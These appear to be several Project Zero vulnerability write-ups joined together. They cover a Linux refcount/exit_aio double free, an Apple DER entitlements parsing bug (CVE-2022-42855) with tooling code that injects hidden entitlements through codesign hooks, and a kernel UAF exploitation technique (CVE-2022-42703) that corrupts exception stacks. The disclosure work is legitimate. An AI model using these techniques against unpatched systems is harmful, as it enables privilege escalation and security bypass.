Additionally, we can call __mmput on this mm from several tasks simultaneously by having each of them trigger an mmget/mmput on the mm, generating irregular race conditions. Under normal execution, it should not be possible to trigger multiple __mmput’s on the same mm (much less concurrent ones) as __mmput should only be called on the last and only refcount decrement which sets the refcount to zero. However, after the refcount overflow, all mmget/mmput’s on the still-referenced mm will trigger an __mmput. This is because each mmput that decrements the refcount to zero (despite the corresponding mmget being why the refcount was above zero in the first place) believes that it is solely responsible for freeing the associated mm.

Flowchart showing how mmget/mmput on a 0 refcount leads to unsafe concurrent __mmput calls.

This racy __mmput primitive extends to its callees as well. exit_aio is a good candidate for taking advantage of this:

void exit_aio(struct mm_struct *mm)

{

        struct kioctx_table *table = rcu_dereference_raw(mm->ioctx_table);

        struct ctx_rq_wait wait;

        int i, skipped;

        if (!table)

                return;

        atomic_set(&wait.count, table->nr);

        init_completion(&wait.comp);

        skipped = 0;

        for (i = 0; i < table->nr; ++i) {

                struct kioctx *ctx =

                rcu_dereference_protected(table->table[i], true);

                if (!ctx) {

                        skipped++;

                        continue;

                }

                ctx->mmap_size = 0;

                kill_ioctx(mm, ctx, &wait);

        }

        if (!atomic_sub_and_test(skipped, &wait.count)) {

                /* Wait until all IO for the context are done. */

                wait_for_completion(&wait.comp);

        }

        RCU_INIT_POINTER(mm->ioctx_table, NULL);

        kfree(table);

}

While the callee function kill_ioctx is written in such a way to prevent concurrent execution from causing memory corruption (part of the contract of aio allows for kill_ioctx to be called in a concurrent way), exit_aio itself makes no such guarantees. Two concurrent calls of exit_aio on the same mm struct can consequently induce a double free of the mm->ioctx_table object, which is fetched at the beginning of the function, while only being freed at the very end. This race window can be widened substantially by creating many aio contexts in order to slow down exit_aio’s internal context freeing loop. Successful exploitation will trigger the following kernel BUG indicating that a double free has occurred:

Kernel backtrace showing the double free condition detection

Note that as this exit_aio path is hit from __mmput, triggering this race will produce at least two permanently deadlocked processes when those processes later try to take the mmap write lock. However, from an exploitation perspective, this is irrelevant as the memory corruption primitive has already occurred before the deadlock occurs. Exploiting the resultant primitive would probably involve racing a reclaiming allocation in between the two frees of the mm->ioctx_table object, then taking advantage of the resulting UAF condition of the reclaimed allocation. It is undoubtedly possible, although I didn’t take this all the way to a completed PoC.

Conclusion

While the null-dereference bug itself was fixed in October 2022, the more important fix was the introduction of an oops limit which causes the kernel to panic if too many oopses occur. While this patch is already upstream, it is important that distributed kernels also inherit this oops limit and backport it to LTS releases if we want to avoid treating such null-dereference bugs as full-fledged security issues in the future. Even in that best-case scenario, it is nevertheless highly beneficial for security researchers to carefully evaluate the side-effects of bugs discovered in the future that are similarly “harmless” and ensure that the abrupt halt of kernel code execution caused by a kernel oops does not lead to other security-relevant primitives.

DER Entitlements: The (Brief) Return of the Psychic Paper

12 January 2023 at 16:59

Posted by Ivan Fratric, Project Zero

Note: The vulnerability discussed here, CVE-2022-42855, was fixed in iOS 15.7.2 and macOS Monterey 12.6.2. While the vulnerability did not appear to be exploitable on iOS 16 and macOS Ventura, iOS 16.2 and macOS Ventura 13.1 nevertheless shipped hardening changes related to it.

Last year, I spent a lot of time researching the security of applications built on top of XMPP, an instant messaging protocol based on XML. More specifically, my research focused on how subtle quirks in XML parsing can be used to undermine the security of such applications. (If you are interested in learning more about that research, I did a talk on it at Black Hat USA 2022. The slides and the recording can be found here and here).

At some point, when a part of my research was published, people pointed out other examples (unrelated to XMPP) where quirks in XML parsing led to security vulnerabilities. One of those examples was a vulnerability dubbed Psychic Paper, a really neat vulnerability in the way Apple operating system checks what entitlements an application has.

Entitlements are one of the core security concepts of Apple’s operating systems. As Apple’s documentation explains, “An entitlement is a right or privilege that grants an executable particular capabilities.” For example, an application on an Apple operating system can’t debug another application without possessing proper entitlements, even if those two applications run as the same user. Even applications running as root can’t perform all actions (such as accessing some of the kernel APIs) without appropriate entitlements.

Psychic Paper was a vulnerability in the way entitlements were checked. Entitlements were stored inside the application’s signature blob in the XML format, so naturally the operating system needed to parse those at some point using an XML parser. The problem was that the OS didn’t have a single parser for this, but rather a staggering four parsers that were used in different places in the operating system. One parser was used for the initial check that the application only has permitted entitlements, and a different parser was later used when checking whether the application has an entitlement to perform a specific action.

When giving my talk on XMPP, I gave a challenge to the audience: Find me two different XML parsers that always, for every input, result in the same output. The reason why that is difficult is because XML, although intended to be a simple format, in reality is anything but simple. So it shouldn’t come as a surprise that a way was found for one of Apple's XML parsers to return one set of entitlements and another parser to see a different set of entitlements when parsing the same entitlements blob.

The fix for the Psychic Paper bug: originally, the problem occurred because Apple had four XML parsers in the OS, so, surprisingly, the fix was to add a fifth one.

So, after my XMPP research, when I learned about the Psychic Paper bug, I decided to take a look at these XML parsers and see if I can somehow find another way to trigger the bug even after the fix. After playing with various Apple XML parsers, I had an XML snippet I wanted to try out. However when I actually tried to use it in an application, I discovered that the system for checking entitlements behaved completely differently than I thought. This was because of…

DER Entitlements

According to Apple developer documentation, “Starting in iOS 15, iPadOS 15, tvOS 15, and watchOS 8, the system checks for a new, more secure signature format that uses Distinguished Encoding Rules, or DER, to embed entitlements into your app’s signature”. As another Apple article boldly proclaims, “The future is DER”.

So, what is DER?

Unlike the previous text-based XML format, DER is a binary format, also commonly used in digital certificates. The format is specified in the X.690 standard.

DER follows relatively simple type-length-data encoding rules. An image from the specification illustrates that:

The Identifier field encodes the object type, which can be a primitive (e.g. a string or a boolean), but also a constructed type (an object containing other objects, e.g. an array/sequence). The length field encodes the number of bytes in the content. Length can be encoded differently, depending on the length of content (e.g. if content is smaller than 128 bytes, then the length field only takes a single byte). Length field is followed by the content itself. In case of constructed types, the content is also encoded using the same encoding rules.

An example from Apple developer documentation shows what DER-encoded entitlements might look like:

appl [ 16 ]       

 INTEGER           :01

 cont [ 16 ]       

  SEQUENCE          

   UTF8STRING        :application-identifier

   UTF8STRING        :SKMME9E2Y8.com.example.apple-samplecode.ProfileExplainer

  SEQUENCE          

   UTF8STRING        :com.apple.developer.team-identifier

   UTF8STRING        :SKMME9E2Y8

  SEQUENCE          

   UTF8STRING        :get-task-allow

   BOOLEAN           :255

  SEQUENCE          

   UTF8STRING        :keychain-access-groups

   SEQUENCE          

    UTF8STRING        :SKMME9E2Y8.*

    UTF8STRING        :com.apple.token

Each individual entitlement is a sequence which has two elements: a key and a value, e.g. “get-task-allow”:boolean(true). All entitlements are also a part of a constructed type (denoted as “cont [ 16 ]” in the listing).

DER is meant to have unique binary representation and replacing XML with DER was very likely motivated, at least in part, by preventing issues such as Psychic Paper. But does it necessarily succeed in that goal?

How entitlements are checked

To understand how entitlements are checked, it is useful to also look at the bigger picture and understand what security/integrity checks Apple operating systems perform on binaries before (and in some cases, while) running them.

Integrity information in Apple binaries is stored in a structure called the Embedded Signature Blob. This structure is a container for various other structures that play a role in integrity checking: The digital signature itself, but also entitlements and an important structure called the Code Directory. The Code Directory contains a hash of every page in the binary (up to the Signature Blob), but also other information, including the hash of the entitlements blob. The hash of the CodeDirectory is called cdHash and it is used to uniquely identify the binary. For example, it is cdHash that the digital signature actually signs. Since Code Directory contains a hash of the entitlements blob, note that any change to entitlements will lead to cdHash being different.

As also noted in the Psychic Paper writeup, there are several ways a binary might be signed:

  • The cdHash of the binary could be in the system’s Trust Cache, which stores the hashes of system binaries.
  • The binary could be signed by the Apple App Store.
  • The binary could be signed by the developer, but in that case it must reference a “Provisioning Profile” signed by Apple.
  • On macOS only, a binary could also be self-signed.

We are mostly interested in the last two cases, because they are the only ones that allow us to provide custom entitlements. However, in those cases, any entitlements a binary has must either be a subset of those allowed by the provisioning profile created by Apple (in the “provisioning profile” case) or entitlements must only contain those whitelisted by the OS (in the self-signed case). That is, unless one has a vulnerability like Psychic Paper.

An entrypoint into file integrity checks is the vnode_check_signature function inside the AppleMobileFileIntegrity kernel extension. AppleMobileFileIntegrity is the kernel component of integrity checking, but there is also the userspace demon: amfid which AppleMobileFileIntegrity uses to perform certain actions as noted further in the text.

We are not going to analyze the full behavior of vnode_check_signature. However, I will highlight the most important actions and those relevant to understanding DER entitlements workflow:

  • First, vnode_check_signature retrieves the entitlements in the DER format. If the currently loaded binary does not contain DER entitlements and only contains entitlements in the XML format, AppleMobileFileIntegrity calls transmuteEntitlementsInDaemon which uses amfid to convert entitlements from XML into DER format. The conversion itself is done via CFPropertyListCreateWithData (to convert XML to CFDictionary) and CESerializeCFDictionary (which converts CFDictionary to DER representation).

  • Checks on the signature are performed using the CoreTrust library by calling CTEvaluateAMFICodeSignatureCMS. This process has recently been documented in another vulnerability writeup and will not be examined in detail as it does not relate to entitlements directly.

  • Additional checks on the signature and entitlements are performed in amfid via the verify_code_directory function. This call will be analyzed in-depth later. One interesting detail about this interaction is that amfid receives the path to the executable as a parameter. In order to prevent race conditions where the file was changed between being loaded by kernel and checked by amfid, amfid returns the cdHash of the checked file. It is then verified that this cdHash matches the cdHash of the file in the kernel.

  • Provisioning profile information is retrieved and it is checked that the entitlements in the binary are a subset of the entitlements in the provisioning profile. This is done with the CEContextIsSubset function. This step does not appear to be present on macOS running on Intel CPUs, however even in that case, the entitlements are still checked in amfid as will be shown below.

The verify_code_directory function of amfid performs (among other things) the following actions:

  • Parses the binary and extracts all the relevant information for integrity checking. The code that does that is part of the open-source Security library and the two most relevant classes here are StaticCode and SecStaticCode. This code is also responsible for extracting the DER-encoded entitlements. Once again, if only XML-encoded entitlements are present, they get converted to DER format. This is, once again, done by the CFPropertyListCreateWithData and CESerializeCFDictionary pair of functions. Additionally, for later use, entitlements are also converted to CFDictionary representation. This conversion from DER to CFDictionary is done using the CEManagedContextFromCFData and CEQueryContextToCFDictionary function pair.

  • Checks that the signature signs the correct cdHash and checks the signature itself. The checking of the digital signature certificate chain isn’t actually done by the amfid process. amfid calls into trustd for that.

  • On macOS, the entitlements contained in the binary are filtered into restricted and unrestricted ones. On macOS, the unrestricted entitlements are com.apple.application-identifier, com.apple.security.application-groups*, com.apple.private.signing-identifier and com.apple.security.*. If the binary contains any entitlements not listed above, it needs to be checked against a provisioning profile. The check here relies on the entitlements CFDictionary, extracted earlier in amfid.

Later, when the binary runs, if the operating system wants to check that the binary contains an entitlement to perform a specific action, it can do this in several ways. The “old way” of doing this is to retrieve a dictionary representation of entitlements and query a dictionary for a specific key. However, there is also a new API for querying entitlements, where the caller first creates a CEQuery object containing the entitlement key they want to query (and, optionally, the expected value) and then performs the query by calling CEContextQuery function with the CEQuery object as a parameter. For example, the IOTaskHasEntitlement function, which takes an entitlement name and returns bool relies on the latter API.

libCoreEntitlements

You might have noticed that a lot of functions for interacting with DER entitlements start with the letters “CE”, such as CEQueryContextToCFDictionary or CEContextQuery. Here, CE stands for libCoreEntitlements, which is a new library created specifically for DER-encoded entitlements. libCoreEntitlements is present both in the userspace (as libCoreEntitlements.dylib) and in the OS kernel (as a part of AppleMobileFileIntegrity kernel extension). So any vulnerability related to parsing the DER entitlement format would be located there.

“There are no vulnerabilities here”, I declared in one of the Project Zero team meetings. At the time, I based this claim on the following:

  • There is a single library for parsing DER entitlements, unlike the four/five used for XML entitlements. While there are two versions of the library, in userspace and kernel, those appear to be the same. Thus, there is no potential for parsing differential bugs like Psychic Paper. In addition to this, binary formats are much less susceptible to such issues in the first place.

  • The library is quite small. I both reviewed and fuzzed the library for memory corruption vulnerabilities and didn’t find anything.

It turns out I was completely wrong (as it often happens when someone declares code is bug free). But first…

Interlude: SHA1 Collisions

After my failure to find a good libCoreEntitlements bug, I turned to other ideas. One thing I noticed when digging into Apple integrity checks is that SHA1 is still supported as a valid hash type for Code Directory / cdHash. Since practical SHA1 collision attacks have been known for some time, I wanted to see if they can somehow be applied to break the entitlement check.

It should be noted that there are two kinds of SHA1 collision attacks:

  • Identical prefix attacks, where an attacker starts with a common file prefix and then constructs collision blocks such that SHA1(prefix + collision_blocks1) == SHA1(prefix + collision_blocks2).

  • Chosen prefix attacks, where the attacker starts with two different prefixes chosen by the attacker and constructs collision blocks such that SHA1(prefix1 + collision_blocks1) == SHA1(prefix2 + collision_blocks2).

While both attacks are currently practical against SHA1, the first type is significantly cheaper than the second one. According to SHA-1 is a Shambles paper from 2020, the authors report a “cost of US$ 11k for a (identical prefix) collision, and US$ 45k for a chosen-prefix collision”. So I wanted to see if an identical prefix attack on DER entitlements is possible. Special thanks to Ange Albertini for bringing me up to speed on the current state of SHA1 collision attacks.

My general idea was to

  • Construct two sets of entitlements that have the same SHA1 hash
  • Since entitlements will have the same SHA1 hash, the cdHash of the corresponding binaries will also be the same, as long as the corresponding Code Directories use SHA1 as the hash algorithm.
  • Exploit a race condition and switch the binary between being opened by the kernel and being opened by amfid
  • If everything goes well, amfid is going to see one set of entitlements and the kernel another set of entitlements, while believing that the binary hasn’t changed.

In order to construct an identical-prefix collision, my plan was to have an entitlements file that contains a long string. The string would declare a 16-bit size and the identical prefix would end right at the place where string length is stored. That way, when a collision is found, lengths of the string in two files would differ. Following the lengths would be more collision data (junk), but that would be considered string content and the parsing of the file would still succeed. Since the length of the string in two files would be different, parsing would continue from two different places in the two files. This idea is illustrated in the following image.

 

A (failed) idea for exploiting an identical prefix SHA1 collision against DER entitlements. The blue parts of the files are the same, while green and the red part represent (different) collision blocks.

Except it won’t work.

The reason it won’t work is that every object in DER, including an object that contains other objects, has a size. Once again, hat tip to Ange Albertini who pointed out right away that this is going to be a problem.

Since each individual entitlement is stored in a separate sequence object, with our collision we could change the length of a string inside the sequence object (e.g. a value of some entitlement), but not change the length of the sequence object itself. Having a mismatch between the sequence length and the length of content inside the sequence could, depending on how the parser is implemented, lead to a parsing failure. Alternatively, if the parser was more permissive, the parser would succeed but would continue parsing after the end of the current sequence, so the collision wouldn’t cause different entitlements to be seen in two different files.

Unless the sequence length is completely ignored.

So I took another look at the library, specifically at how sequence length was handled in different parts of the library, and that is when I found the actual bug.

The actual bug

libCoreEntitlements does not implement traversing DER entitlements in a single place. Instead, traversing is implemented in (at least) three different places:

  • Inside recursivelyValidateEntitlements, called from CEValidate which is used to validate entitlements before being loaded (e.g. CEValidate is called from CEManagedContextFromCFData which was mentioned before). Among other things, CEValidate ensures that entitlements are in alphabetical order and there are no duplicate entitlements.
  • der_vm_iterate, which is used when converting entitlements to dictionary (CEQueryContextToCFDictionary), but also from CEContextIsSubset.
  • der_vm_execute_nocopy, which is used when querying entitlements using CEContextQuery API.

The actual bug is that these traversal algorithms behave slightly differently, in particular in how they handle entitlement sequence length. der_vm_iterate behaved correctly and, after processing a single key/value sequence, continued processing after the sequence end (as indicated by the sequence length). recursivelyValidateEntitlements and der_vm_execute_nocopy however completely ignore the sequence length (beyond an initial check that it is within bounds of the entitlements blob) and, after processing a single entitlement (key/value sequence), would continue processing after the end of the value. This difference in iterating over entitlements is illustrated in the following image.

 

Illustration of how different algorithms within libCoreEntitlements traverse the same DER structure. der_vm_iterate is shown as green arrows on the left while der_vm_execute is shown as red arrows on the right. The red parts of the file represent a “hidden” entitlement that is only visible to the second algorithm.

This allowed hiding entitlements by embedding them as children of other entitlements, as shown below. Such entitlements would then be visible to CEValidate and CEContextQuery, but hidden from CEQueryContextToCFDictionary and CEContextIsSubset.

SEQUENCE          

  UTF8STRING        :application-identifier

  UTF8STRING        :testapp

  SEQUENCE          

    UTF8STRING        :com.apple.private.foo

    UTF8STRING        :bar

SEQUENCE          

  UTF8STRING        :get-task-allow

  BOOLEAN           :255

Luckily (for an attacker), the functions used to perform the check that all entitlements in the binary are a subset of those in the provisioning profile wouldn’t see these hidden entitlements, which would only surface when the kernel would query for a presence of a specific entitlement using the CEContextQuery API.

Since CEValidate would also see the “hidden” entitlements, these would need to be in alphabetical order together with “normal” entitlements. However, because generally allowed entitlements such as application-identifier on iOS and com.apple.application-identifier on macOS appear pretty soon in the alphabetical order, this requirement doesn’t pose an obstacle for exploitation.

Exploitation

In order to try to exploit these issues, some tooling was required. Firstly, tooling to create crafted entitlements DER. For this, I created a small utility called createder.cpp which can be used for example as

./createder entitlements.der com.apple.application-identifier=testapp -- com.apple.private.security.kext-collection-management 

where entitlements.der is the output DER encoded entitlements file, entitlements before “--” are “normal” entitlements and those after “--” are hidden.

Next, I needed a way to embed such crafted entitlements into a signature blob. Normally, for signing binaries, Apple’s codesign utility is used. However, this utility only accepts XML entitlements as input and the user can’t provide a DER blob. At some point, codesign converts the user-provided XML to DER and embeds both in the resulting binary.

I decided the easiest way to embed custom DER in a binary would be to modify codesign behavior, specifically the XML to DER conversion process. To do this, I used TinyInst, a dynamic instrumentation library I developed together with contributors. TinyInst currently supports macOS and Windows.

In order to embed custom DER, I hooked two functions from libCoreEntitlements that are used during XML to DER conversion: CESizeSerialization and CESerialize (CESerializeWithOptions on macOS 13 / iOS 16). The first one computes the size of DER while the second one outputs DER bytes.

Initially, I wrote these hooks using TinyInst’s general-purpose low-level instrumentation API. However, since this process was more cumbersome than necessary, in the meantime I created an API specifically for function hooking. So instead of linking to my initial implementation that I sent with the bug report to Apple, let me instead show how the hooks would be implemented using the new TinyInst Hook API:

cehook.h

#include "hook.h"

class CESizeSerializationHook : public HookReplace {

public:

  CESizeSerializationHook() : HookReplace("libCoreEntitlements.dylib",

                                          "_CESizeSerialization",3) {}

protected:

  void OnFunctionEntered() override;

};

class CESerializeWithOptionsHook : public HookReplace {

public:

  CESerializeWithOptionsHook() : HookReplace("libCoreEntitlements.dylib",

                                             "_CESerializeWithOptions", 6) {}

protected:

  void OnFunctionEntered() override;

};

// the main client

class CEInst : public TinyInst {

public:

  CEInst();

protected:

  void OnModuleLoaded(void* module, char* module_name) override;

};

cehook.cpp

#include "cehook.h"

#include <fstream>

char *der;

size_t der_size;

size_t kCENoError;

// read entitlements.der into buffer

void ReadEntitlementsFile() {

  std::ifstream file("entitlements.der", std::ios::binary | std::ios::ate);

  if(file.fail()) {

    FATAL("Error reading entitlements file");

  }

  der_size = (size_t)file.tellg();

  file.seekg(0, std::ios::beg);

  der = (char *)malloc(der_size);

  file.read(der, der_size);

}

void CESizeSerializationHook::OnFunctionEntered() {

  // 3rd argument (output) is a pointer to the size

  printf("In CESizeSerialization\n");

  size_t out_addr = GetArg(2);

  RemoteWrite((void*)out_addr, &der_size, sizeof(der_size));

  SetReturnValue(kCENoError);

}

void CESerializeWithOptionsHook::OnFunctionEntered() {

  // 5th argument points to output buffer

  printf("In CESerializeWithOptions\n");

  size_t out_addr = GetArg(4);

  RemoteWrite((void*)out_addr, der, der_size);

  SetReturnValue(kCENoError);

}

CEInst::CEInst() {

  ReadEntitlementsFile();

  RegisterHook(new CESizeSerializationHook());

  RegisterHook(new CESerializeWithOptionsHook());

}

void CEInst::OnModuleLoaded(void* module, char* module_name) {

  if(!strcmp(module_name, "libCoreEntitlements.dylib")) {

    // we must get the value of kCENoError,

    // which is libCoreEntitlements return value in case no error

    size_t kCENoError_addr = 

           (size_t)GetSymbolAddress(module, (char*)"_kCENoError");

    if (!kCENoError_addr) FATAL("Error resolving symbol");

    RemoteRead((void *)kCENoError_addr, &kCENoError, sizeof(kCENoError));

  }

  TinyInst::OnModuleLoaded(module, module_name);

}

HookReplace (base class for our 2 hooks) is a helper class used to completely replace the function implementation with the hook. CESizeSerializationHook::OnFunctionEntered() and CESerializeWithOptionsHook::OnFunctionEntered() are the bodies of the hooks. Additional code is needed to read the replacement entitlement DER and also to retrieve the value of kCENoError, which is a value libCoreEntitlements functions return on success and that we must return from our hooked versions. Note that, on macOS Monterey, CESerializeWithOptions should be replaced with CESerialize and the 3rd argument will be the output address rather than 4th.

So, with that in place, I could sign a binary using DER provided in the entitlements.der file.

Now, with the tooling in place, the question becomes, how to exploit it. Or rather, which entitlement to target. In order to exploit the issue, we need to find an entitlement check that is ultimately made using CEContextQuery API. Unfortunately, that rules out most userspace daemons - all the ones I looked at still did entitlement checking the “old way”, by first obtaining a dictionary representation of entitlements. That leaves “just” the entitlement checks done by the OS kernel.

Fortunately, a lot of checks in the kernel are made using the vulnerable API. Some of these checks are done by AppleMobileFileIntegrity itself using functions like OSEntitlements::queryEntitlementsFor, AppleMobileFileIntegrity::AMFIEntitlementGetBool or proc_has_entitlement. But there are other APIs as well. For example, the IOTaskHasEntitlement and IOCurrentTaskHasEntitlement functions that are used from over a hundred places in the kernel (according to macOS Monterey kernel cache) end up calling CEContextQuery (by first calling amfi->OSEntitlements_query()).

One other potentially vulnerable API was IOUserClient::copyClientEntitlement, but only on Apple silicon, where pmap_cs_enabled() is true. Although I didn’t test this, there is some indication that in that case the CEContextQuery API or something similar to it is used. IOUserClient::copyClientEntitlement is most notably used by device drivers to check entitlements.

I attempted to exploit the issue on both macOS and iOS. On macOS, I found places where such an entitlement bypass could be used to unlock previously unreachable attack surfaces, but nothing that would immediately provide a stand-alone exploit. In the end, to report something while looking for a better primitive, I reported that I was able to invoke functionality of the kext_request API (kernel extension API) that I normally shouldn’t be able to do, even as the root user. At the time, I did my testing on macOS Monterey, versions 12.6 and 12.6.1.

On iOS, exploiting such an issue would potentially be more interesting, as it could be used as part of a jailbreak. I was experimenting with iOS 16.1 and nothing I tried seemed to work, but due to the lack of introspection on the iOS platform I couldn’t figure out why at the time.

That is, until I received a reply from Apple on my macOS report, asking me if I can reproduce on macOS Ventura. macOS Ventura was just released in the same week when I sent my report to Apple and I was hesitant to upgrade to a new major version while having a working setup on macOS Monterey. But indeed, when I upgraded to Ventura, and after making sure my tooling still works, the DER issue wouldn’t reproduce anymore. This was likely also the reason all of my iOS experiments were unsuccessful: iOS 16 shares the codebase with macOS Ventura.

It appears that the issue was fixed due to refactoring and not as a security issue (macOS Monterey would be updated in this case as well as Apple releases some security patches not just for the latest major version of macOS, but also for the two previous ones). Looking at the code, it appears the API libCoreEntitlements uses to do low-level DER parsing has changed somewhat - on macOS Monterey, libCoreEntitlements used mostly ccder_decode* functions to interact with DER, while on macOS ventura ccder_blob_decode* functions are used more often. The latter additionally take the parent DER structure as input and thus make processing of hierarchical DER structure somewhat less error-prone. As a consequence of this change, der_vm_execute_nocopy continues processing the next key/value sequence after the end of the current one (which is the intended behavior) and not, as before, after the end of the value object.  At this point, since I could no longer reproduce the issue on the latest OS release, I was no longer motivated to write the exploit and stopped my efforts in order to focus on other projects.

Apple addressed the issue as CVE-2022-42855 on December 13, 2022. While Apple applied the CVE to all supported versions of their operating systems, including macOS Ventura and iOS 16, on those latest OS versions the patch seems to serve as an additional validation step. Specifically, on macOS Ventura, the patch is applied to function der_decode_key_value and makes sure that the key/value sequence does not contain other elements besides just key and the value (in other words, it makes sure that the length of the sequence matches length of key + value objects).

Conclusion

It is difficult to claim that a particular code base has no vulnterabilities. While that might be possible for a specific type of vulnerabilities, it is difficult, and potentially impossible, to predict all types of vulnerabilities a complex codebase might have. After all, you can’t reason about what you don’t know.

While DER encoding is certainly a much safer choice than XML when it comes to parsing logic issues, this blog post demonstrates that such issues are still possible even with the DER format.

And what about the SHA1 collision? While the identical prefix attack shouldn’t work against DER, doesn’t that still leave the chosen prefix attack? Maybe, but that’s something to explore another time. Or maybe (hopefully) Apple will remove SHA1 support in their signature blobs and there will be nothing to explore at all.

Exploiting CVE-2022-42703 - Bringing back the stack attack

8 December 2022 at 19:04

Seth Jenkins, Project Zero


This blog post details an exploit for CVE-2022-42703 (P0 issue 2351 - Fixed 5 September 2022), a bug Jann Horn found in the Linux kernel's memory management (MM) subsystem that leads to a use-after-free on struct anon_vma. As the bug is very complex (I certainly struggle to understand it!), a future blog post will describe the bug in full. For the time being, the issue tracker entry, this LWN article explaining what an anon_vma is and the commit that introduced the bug are great resources in order to gain additional context.

Setting the scene

Successfully triggering the underlying vulnerability causes folio->mapping to point to a freed anon_vma object. Calling madvise(..., MADV_PAGEOUT)can then be used to repeatedly trigger accesses to the freed anon_vma in folio_lock_anon_vma_read():



struct anon_vma *folio_lock_anon_vma_read(struct folio *folio,

  struct rmap_walk_control *rwc)

{

struct anon_vma *anon_vma = NULL;

struct anon_vma *root_anon_vma;

unsigned long anon_mapping;


rcu_read_lock();

anon_mapping = (unsigned long)READ_ONCE(folio->mapping);

if ((anon_mapping & PAGE_MAPPING_FLAGS) != PAGE_MAPPING_ANON)

goto out;

if (!folio_mapped(folio))

goto out;


// anon_vma is dangling pointer

anon_vma = (struct anon_vma *) (anon_mapping - PAGE_MAPPING_ANON);

// root_anon_vma is read from dangling pointer

root_anon_vma = READ_ONCE(anon_vma->root);

if (down_read_trylock(&root_anon_vma->rwsem)) {

[...]

if (!folio_mapped(folio)) { // false

[...]

}

goto out;

}


if (rwc && rwc->try_lock) { // true

anon_vma = NULL;

rwc->contended = true;

goto out;

}

[...]

out:

rcu_read_unlock();

return anon_vma; // return dangling pointer

}


One potential exploit technique is to let the function return the dangling anon_vma pointer and try to make the subsequent operations do something useful. Instead, we chose to use the down_read_trylock() call within the function to corrupt memory at a chosen address, which we can do if we can control the root_anon_vma pointer that is read from the freed anon_vma.


Controlling the root_anon_vma pointer means reclaiming the freed anon_vma with attacker-controlled memory. struct anon_vma structures are allocated from their own kmalloc cache, which means we cannot simply free one and reclaim it with a different object. Instead we cause the associated anon_vma slab page to be returned back to the kernel page allocator by following a very similar strategy to the one documented here. By freeing all the anon_vma objects on a slab page, then flushing the percpu slab page partial freelist, we can cause the virtual memory previously associated with the anon_vma to be returned back to the page allocator. We then spray pipe buffers in order to reclaim the freed anon_vma with attacker controlled memory.


At this point, we’ve discussed how to turn our use-after-free into a down_read_trylock() call on an attacker-controlled pointer. The implementation of down_read_trylock() is as follows:


struct rw_semaphore {

atomic_long_t count;

atomic_long_t owner;

struct optimistic_spin_queue osq; /* spinner MCS lock */

raw_spinlock_t wait_lock;

struct list_head wait_list;

};


...


static inline int __down_read_trylock(struct rw_semaphore *sem)

{

long tmp;


DEBUG_RWSEMS_WARN_ON(sem->magic != sem, sem);


tmp = atomic_long_read(&sem->count);

while (!(tmp & RWSEM_READ_FAILED_MASK)) {

if (atomic_long_try_cmpxchg_acquire(&sem->count, &tmp,

    tmp + RWSEM_READER_BIAS)) {

rwsem_set_reader_owned(sem);

return 1;

}

}

return 0;

}



It was helpful to emulate the down_read_trylock() in unicorn to determine how it behaves when given different sem->count values. Assuming this code is operating on inert and unchanging memory, it will increment sem->count by 0x100 if the 3 least significant bits and the most significant bit are all unset. That means it is difficult to modify a kernel pointer and we cannot modify any non 8-byte aligned values (as they’ll have one or more of the bottom three bits set). Additionally, this semaphore is later unlocked, causing whatever write we perform to be reverted in the imminent future. Furthermore, at this point we don’t have an established strategy for determining the KASLR slide nor figuring out the addresses of any objects we might want to overwrite with our newfound primitive. It turns out that regardless of any randomization the kernel presently has in place, there’s a straightforward strategy for exploiting this bug even given such a constrained arbitrary write.

Stack corruption…

On x86-64 Linux, when the CPU performs certain interrupts and exceptions, it will swap to a respective stack that is mapped to a static and non-randomized virtual address, with a different stack for the different exception types. A brief documentation of those stacks and their parent structure, the cpu_entry_area, can be found here. These stacks are most often used on entry into the kernel from userland, but they’re used for exceptions that happen in kernel mode as well. We’ve recently seen KCTF entries where attackers take advantage of the non-randomized cpu_entry_area stacks in order to access data at a known virtual address in kernel accessible memory even in the presence of SMAP and KASLR. You could also use these stacks to forge attacker-controlled data at a known kernel virtual address. This works because the attacker task’s general purpose register contents are pushed directly onto this stack when the switch from userland to kernel mode occurs due to one of these exceptions. This also occurs when the kernel itself generates an Interrupt Stack Table exception and swaps to an exception stack - except in that case, kernel GPR’s are pushed instead. These pushed registers are later used to restore kernel state once the exception is handled. In the case of a userland triggered exception, register contents are restored from the task stack.


One example of an IST exception is a DB exception which can be triggered by an attacker via a hardware breakpoint, the associated registers of which are described here. Hardware breakpoints can be triggered by a variety of different memory access types, namely reads, writes, and instruction fetches. These hardware breakpoints can be set using ptrace(2), and are preserved during kernel mode execution in a task context such as during a syscall. That means that it’s possible for an attacker-set hardware breakpoint to be triggered in kernel mode, e.g. during a copy_to/from_user call. The resulting exception will save and restore the kernel context via the aforementioned non-randomized exception stack, and that kernel context is an exceptionally good target for our arbitrary write primitive.


Any of the registers that copy_to/from_user is actively using at the time it handles the hardware breakpoint are corruptible by using our arbitrary-write primitive to overwrite their saved values on the exception stack. In this case, the size of the copy_user call is the intuitive target. The size value is consistently stored in the rcx register, which will be saved at the same virtual address every time the hardware breakpoint is hit. After corrupting this saved register with our arbitrary write primitive, the kernel will restore rcx from the exception stack once it returns back to copy_to/from_user. Since rcx defines the number of bytes copy_user should copy, this corruption will cause the kernel to illicitly copy too many bytes between userland and the kernel.

…begets stack corruption

The attack strategy starts as follows:

  1. Fork a process Y from process X.

  2. Process X ptraces process Y, then sets a hardware breakpoint at a known virtual address [addr] in process Y.

  3. Process Y makes a large number of calls to uname(2), which calls copy_to_user from a kernel stack buffer to [addr]. This causes the kernel to constantly trigger the hardware watchpoint and enter the DB exception handler, using the DB exception stack to save and restore copy_to_user state

  4. Simultaneously make many arbitrary writes at the known location of the DB exception stack’s saved rcx value, which is Process Y’s copy_to_user’s saved length.


DB Exception handling while the arbitrary write primitive writes to the CEA stack leads to corruption of the rcx register



The DB exception stack is used rarely, so it’s unlikely that we corrupt any unexpected kernel state via a spurious DB exception while spamming our arbitrary write primitive. The technique is also racy, but missing the race simply means corrupting stale stack-data. In that case, we simply try again. In my experience, it rarely takes more than a few seconds to win the race successfully.


Upon successful corruption of the length value, the kernel will copy much of the current task’s stack back to userland, including the task-local stack cookie and return addresses. We can subsequently invert our technique and attack a copy_from_user call instead. Instead of copying too many bytes from the kernel task stack to userland, we elicit the kernel to copy too many bytes from userland to the kernel task stack! Again we use a syscall, prctl(2), that performs a copy_from_user call to a kernel stack buffer. Now by corrupting the length value, we generate a stack buffer overflow condition in this function where none previously existed. Since we’ve already leaked the stack cookie and the KASLR slide, it is trivially easy to bypass both mitigations and overwrite the return address.


Image showing that we’ve gained control of the instruction pointer


Completing a ROP chain for the kernel is left as an exercise to the reader.

